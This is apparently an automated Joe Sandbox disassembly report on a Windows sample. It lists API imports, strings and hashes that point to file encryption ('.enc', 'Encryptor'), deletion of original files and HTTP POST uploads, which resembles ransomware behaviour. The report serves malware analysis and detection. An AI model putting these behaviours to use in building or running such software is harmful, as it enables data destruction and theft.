Part of subcall function 00007FF6F18AB370: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB409
Part of subcall function 00007FF6F18AB370: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB419
Part of subcall function 00007FF6F18AB370: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB4FC
Part of subcall function 00007FF6F18AB370: ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB503
Part of subcall function 00007FF6F18AB370: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB510

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A5FDE
InternetOpenW.WININET ref: 00007FF6F18A5FFB
GetLastError.KERNEL32 ref: 00007FF6F18A601F
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A602A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A603A
InternetCrackUrlW.WININET ref: 00007FF6F18A60F6
GetLastError.KERNEL32 ref: 00007FF6F18A611A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A6125
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A6135
InternetCloseHandle.WININET ref: 00007FF6F18A613E
InternetConnectW.WININET ref: 00007FF6F18A61FA
HttpOpenRequestW.WININET ref: 00007FF6F18A624C
GetLastError.KERNEL32 ref: 00007FF6F18A6270
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A627B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A628B
InternetCloseHandle.WININET ref: 00007FF6F18A6294
HttpSendRequestW.WININET ref: 00007FF6F18A62ED
GetLastError.KERNEL32 ref: 00007FF6F18A6311
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6F18A631C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6F18A632C
InternetCloseHandle.WININET ref: 00007FF6F18A6335
InternetCloseHandle.WININET ref: 00007FF6F18A633E
InternetCloseHandle.WININET ref: 00007FF6F18A6347

Part of subcall function 00007FF6F18AB370: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,?,?,00007FF6F18A5AA2), ref: 00007FF6F18AB466

Strings

InternetConnect failed with error: , xrefs: 00007FF6F18A6208
InternetOpen failed with error: , xrefs: 00007FF6F18A6009
InternetCrackUrl failed with error: , xrefs: 00007FF6F18A6104
Content-Type: application/x-www-form-urlencoded, xrefs: 00007FF6F18A62E3
HttpSendRequest failed with error: , xrefs: 00007FF6F18A62FB
remove, xrefs: 00007FF6F18A6C4E
h, xrefs: 00007FF6F18A60B0
Error opening files for encryption: , xrefs: 00007FF6F18A6BF8
POST, xrefs: 00007FF6F18A6242
with data: , xrefs: 00007FF6F18A5FAC
HttpOpenRequest failed with error: , xrefs: 00007FF6F18A625A
POST request completed with response: , xrefs: 00007FF6F18A646D
Making POST request to: , xrefs: 00007FF6F18A5F80
Encryptor, xrefs: 00007FF6F18A5FF4
.enc, xrefs: 00007FF6F18A6632
text/*, xrefs: 00007FF6F18A6214

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$Internet$CloseHandleV01@@$ErrorLast$?good@ios_base@std@@HttpOpenRequest$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputc@?$basic_streambuf@?uncaught_exceptions@std@@ConnectCrackOsfx@?$basic_ostream@SendV12@
String ID: with data: $.enc$Content-Type: application/x-www-form-urlencoded$Encryptor$Error opening files for encryption: $HttpOpenRequest failed with error: $HttpSendRequest failed with error: $InternetConnect failed with error: $InternetCrackUrl failed with error: $InternetOpen failed with error: $Making POST request to: $POST$POST request completed with response: $h$remove$text/*
API String ID: 730722797-3239946946
Opcode ID: b5a2be8c57679f83b7efd29263f6ff0ced3688bc93fe687ca8b7c3f66dfcc50e
Instruction ID: 82f1e58abaa0ae037284ee8d112c2b688788e6990358d41fda91ed99edec9afc
Opcode Fuzzy Hash: b5a2be8c57679f83b7efd29263f6ff0ced3688bc93fe687ca8b7c3f66dfcc50e
Instruction Fuzzy Hash: 7772A562F28B8292EB10DB25E5443AD7761FB85BD4F505236DABD82AD9EF3CD184C700

Function 00007FF6F18CD5D8 Relevance: 33.2, APIs: 22, Instructions: 224fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF6F18CD685
GetLastError.KERNEL32 ref: 00007FF6F18CD68F
FindFirstFileW.KERNEL32 ref: 00007FF6F18CD6A6
GetLastError.KERNEL32 ref: 00007FF6F18CD6B2
FindClose.KERNEL32 ref: 00007FF6F18CD6C0
__std_fs_open_handle.LIBCPMT ref: 00007FF6F18CD753
CloseHandle.KERNEL32 ref: 00007FF6F18CD769
CloseHandle.KERNEL32 ref: 00007FF6F18CD8E6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18CD8F0

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
String ID:
API String ID: 4293554670-0
Opcode ID: c42828e7afe3a8f2a65d1a0de966bafc8e91fa9268b19287f0389173d9b8275d
Instruction ID: 0a3e07af3a1ee4a7ed8b0f7540523eeea150b882b21af8bed66d2f075fd7330c
Opcode Fuzzy Hash: c42828e7afe3a8f2a65d1a0de966bafc8e91fa9268b19287f0389173d9b8275d
Instruction Fuzzy Hash: B1918031B28A4346E764AB25AA4467636A1EF84BF4F040735D97F876E4FF3CE8458780

Function 00007FF6F18AE790 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 343COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18AE856
__std_type_info_name.VCRUNTIME140 ref: 00007FF6F18AE8BE
memmove.VCRUNTIME140 ref: 00007FF6F18AE953
__std_type_info_name.VCRUNTIME140 ref: 00007FF6F18AE9BD

Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE182
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE190

Part of subcall function 00007FF6F18AE090: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AE1C9
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE1D3
Part of subcall function 00007FF6F18AE090: memmove.VCRUNTIME140 ref: 00007FF6F18AE1E1
Part of subcall function 00007FF6F18AE090: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F18AE216

Part of subcall function 00007FF6F18AADA0: memmove.VCRUNTIME140 ref: 00007FF6F18AADE6

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEAE8
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEB29
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEB7A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEBCA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEC1A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18AEC69

Strings

', trying to retrieve ', xrefs: 00007FF6F18AE949, 00007FF6F18AE96C
#, xrefs: 00007FF6F18AE7F8
', stored ', xrefs: 00007FF6F18AE84C, 00007FF6F18AE86E
NameValuePairs: type mismatch for ', xrefs: 00007FF6F18AE801

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemmove$__std_type_info_name$Concurrency::cancel_current_task
String ID: #$', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
API String ID: 2393555612-3687095204
Opcode ID: 8a5f6fec41d4cd1aa4cda9eb7e4e441d1935e23c07ddbdd7c9288122768680d4
Instruction ID: bb811c25e7600a3e02f10b41a2b6738b0c51a4f22f84a41617e3d617509943d8
Opcode Fuzzy Hash: 8a5f6fec41d4cd1aa4cda9eb7e4e441d1935e23c07ddbdd7c9288122768680d4
Instruction Fuzzy Hash: FEF1C362E28B8686EB00DB64E9403AD6761FB957D4F505732EABC52BD5EF7CE180D300

Function 00007FF6F18B5030 Relevance: 24.4, APIs: 11, Strings: 5, Instructions: 442COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18B5214
memset.VCRUNTIME140 ref: 00007FF6F18B5245
memset.VCRUNTIME140 ref: 00007FF6F18B5260
memmove.VCRUNTIME140 ref: 00007FF6F18B53ED
memset.VCRUNTIME140 ref: 00007FF6F18B53FE
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B54F9
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B5528
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B5553
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B5582
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B55B1
_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B55E0

Part of subcall function 00007FF6F18AF230: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6F18AF261

Strings

StreamTransformationFilter: invalid PKCS #7 block padding found, xrefs: 00007FF6F18B5588
StreamTransformationFilter: plaintext length is not a multiple of block size and NO_PADDING is specified, xrefs: 00007FF6F18B552E
StreamTransformationFilter: invalid ones-and-zeros padding found, xrefs: 00007FF6F18B54FF
StreamTransformationFilter: ciphertext length is not a multiple of block size, xrefs: 00007FF6F18B54D4, 00007FF6F18B5559
StreamTransformationFilter: invalid W3C block padding found, xrefs: 00007FF6F18B55B7

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionThrow$memset$memmove$free
String ID: StreamTransformationFilter: ciphertext length is not a multiple of block size$StreamTransformationFilter: invalid PKCS #7 block padding found$StreamTransformationFilter: invalid W3C block padding found$StreamTransformationFilter: invalid ones-and-zeros padding found$StreamTransformationFilter: plaintext length is not a multiple of block size and NO_PADDING is specified
API String ID: 2247322960-363503293
Opcode ID: 1bc649ee42167517fa23a1c3fd1ef432a0e526d7752cf43d5f8a62c20833d6b1
Instruction ID: 10c3cb6976d04b0ed171b165e159ef0f08ff2f0433ed91f9c7d7b12adc9aa5d1
Opcode Fuzzy Hash: 1bc649ee42167517fa23a1c3fd1ef432a0e526d7752cf43d5f8a62c20833d6b1
Instruction Fuzzy Hash: D102BD72B28A8682EB10DB65D6446EC2361FB89BC8F454032DE2D977DAEF3DD509C700

Function 00007FF6F18C92D0 Relevance: 20.2, Strings: 16, Instructions: 225COMMON

Download Yara Rule

Strings

ntel, xrefs: 00007FF6F18C93B3
Auth, xrefs: 00007FF6F18C9451
ter!, xrefs: 00007FF6F18C947A
cAMD, xrefs: 00007FF6F18C945A
sbet, xrefs: 00007FF6F18C9472
uine, xrefs: 00007FF6F18C948E
aurH, xrefs: 00007FF6F18C9566
VIA2, xrefs: 00007FF6F18C9572
Genu, xrefs: 00007FF6F18C93A6
Cent, xrefs: 00007FF6F18C9551
Hygo, xrefs: 00007FF6F18C9481
auls, xrefs: 00007FF6F18C955A
ineI, xrefs: 00007FF6F18C93BF
AMDi, xrefs: 00007FF6F18C9469
enti, xrefs: 00007FF6F18C9462
nGen, xrefs: 00007FF6F18C949A

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID: AMDi$Auth$Cent$Genu$Hygo$VIA2$auls$aurH$cAMD$enti$ineI$nGen$ntel$sbet$ter!$uine
API String ID: 0-2699536740
Opcode ID: 56a64bfb53f0f207bb90e6df8f0b0e955711caa2a3b4d91682d613884a714019
Instruction ID: b0fd4d15db23d09c986e286a66eabf77b6bcd838dafefaacc96d65b0f58b7064
Opcode Fuzzy Hash: 56a64bfb53f0f207bb90e6df8f0b0e955711caa2a3b4d91682d613884a714019
Instruction Fuzzy Hash: A6A1F532E3C9D28AF715C7A49A652BC27A16B65384F84027ED879D66C3EF2CE741C701

Function 00007FF6F18CEAC8 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6F18CEAE4
memset.VCRUNTIME140 ref: 00007FF6F18CEB08
RtlCaptureContext.KERNEL32 ref: 00007FF6F18CEB11
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6F18CEB2B
RtlVirtualUnwind.KERNEL32 ref: 00007FF6F18CEB6C
memset.VCRUNTIME140 ref: 00007FF6F18CEB9F
IsDebuggerPresent.KERNEL32 ref: 00007FF6F18CEBC0
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6F18CEBDD
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6F18CEBE8

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 24ac4a5c0edfec2dd9856ae6b49da6030134b59cc6ca2683bbef0f62edf28d80
Instruction ID: 2a6fae083d684c3af73949ef13e4bdfd67b490eb5758227c1af860da2975f986
Opcode Fuzzy Hash: 24ac4a5c0edfec2dd9856ae6b49da6030134b59cc6ca2683bbef0f62edf28d80
Instruction Fuzzy Hash: 5A315272714B828AEB609F64E8803ED7761FB44784F44453ADA6E97B94EF38D548C710

Function 00007FF6F18B78F0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

BCryptGenRandom.BCRYPT ref: 00007FF6F18B7966
SetLastError.KERNEL32 ref: 00007FF6F18B7999

Part of subcall function 00007FF6F18B7500: GetLastError.KERNEL32 ref: 00007FF6F18B752C
Part of subcall function 00007FF6F18B7500: memmove.VCRUNTIME140 ref: 00007FF6F18B75D5

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B79CC
SetLastError.KERNEL32 ref: 00007FF6F18B7A1E

Part of subcall function 00007FF6F18B7500: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B7720
Part of subcall function 00007FF6F18B7500: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B775F
Part of subcall function 00007FF6F18B7500: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B779E
Part of subcall function 00007FF6F18B7500: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18B77ED

_CxxThrowException.VCRUNTIME140 ref: 00007FF6F18B7A51

Strings

BCryptGenRandom, xrefs: 00007FF6F18B7A24
GenerateBlock size, xrefs: 00007FF6F18B799F

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$ExceptionThrow$CryptRandommemmove
String ID: BCryptGenRandom$GenerateBlock size
API String ID: 2556401462-1797140735
Opcode ID: 54738510e4d79f28839e03d2e268ec9d8d7ba6a6f5efe46de91931a604b5ac00
Instruction ID: 0f6556e582732a0b319a3fcde215260039798799d59f5b2efdee0ea867f716e9
Opcode Fuzzy Hash: 54738510e4d79f28839e03d2e268ec9d8d7ba6a6f5efe46de91931a604b5ac00
Instruction Fuzzy Hash: C7313921B28A8392EB10DB64EA512B96321BF947C4F805136D57DC76F6FF2CEA49C740

Function 00007FF6F18A3550 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

__std_fs_close_handle.MSVCPRT ref: 00007FF6F18A3757
__std_fs_close_handle.MSVCPRT ref: 00007FF6F18A3764
__std_fs_close_handle.MSVCPRT ref: 00007FF6F18A390D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A3966

Strings

., xrefs: 00007FF6F18A3830

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: __std_fs_close_handle$_invalid_parameter_noinfo_noreturn
String ID: .
API String ID: 2988816983-248832578
Opcode ID: 2391b008f3ac895b2b4d8add334e6682f2e07c82953912927af775f946555b26
Instruction ID: f9b9abda6d58b74343953fe1752f567a011f88fdf9a8c1f155228c4dc4f01aa3
Opcode Fuzzy Hash: 2391b008f3ac895b2b4d8add334e6682f2e07c82953912927af775f946555b26
Instruction Fuzzy Hash: ABC18F72A28A82A7EB609F29D6442B963A1EB44BD4F544131EF7D877D4EF7CE841C340

Function 00007FF6F18A5350 Relevance: 7.8, APIs: 5, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F18B9510: memset.VCRUNTIME140 ref: 00007FF6F18B9617
Part of subcall function 00007FF6F18B9510: memset.VCRUNTIME140 ref: 00007FF6F18B9626

Part of subcall function 00007FF6F18B7A80: BCryptGenRandom.BCRYPT ref: 00007FF6F18B7B2E
Part of subcall function 00007FF6F18B7A80: BCryptCloseAlgorithmProvider.BCRYPT ref: 00007FF6F18B7B48
Part of subcall function 00007FF6F18B7A80: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6F18B7B6F

memset.VCRUNTIME140 ref: 00007FF6F18A5417
memset.VCRUNTIME140 ref: 00007FF6F18A5474
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A5690
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A56D1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A57D1

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memset$_invalid_parameter_noinfo_noreturn$Crypt$AlgorithmCloseProviderRandomfree
String ID:
API String ID: 3720606010-0
Opcode ID: 6a0de0dc6c1b765295161af81fa62e0411553d03176bbc1ce52247b14f94f984
Instruction ID: 1468239d8c3836ca3adaee46fa28b68b93bdd5d842393f6e5729c44a27c55021
Opcode Fuzzy Hash: 6a0de0dc6c1b765295161af81fa62e0411553d03176bbc1ce52247b14f94f984
Instruction Fuzzy Hash: 81D1A332E24B8696E710CF64D9403ED3761FB95798F405236EA6C47AE9EF38E684C740

Function 00007FF6F18AFC00 Relevance: 6.3, APIs: 4, Instructions: 258COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18AFDB4

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 2c09d2fae0943cf36a84b6c7ffaae385ada5a84a5032afdd4e2d5b16b7ff0c9b
Instruction ID: 5b1f561bc5421b4d9f866d5d53c1053ae0030fa2233c99524e212ce2d0acf351
Opcode Fuzzy Hash: 2c09d2fae0943cf36a84b6c7ffaae385ada5a84a5032afdd4e2d5b16b7ff0c9b
Instruction Fuzzy Hash: A6B1B122F28A419AFB149B75D6403AC62A6AB057D8F048335DE7D57BD9EF38E191C380

Function 00007FF6F18CE9C4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6F18CE9F0
GetCurrentThreadId.KERNEL32 ref: 00007FF6F18CE9FE
GetCurrentProcessId.KERNEL32 ref: 00007FF6F18CEA0A
QueryPerformanceCounter.KERNEL32 ref: 00007FF6F18CEA1A

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

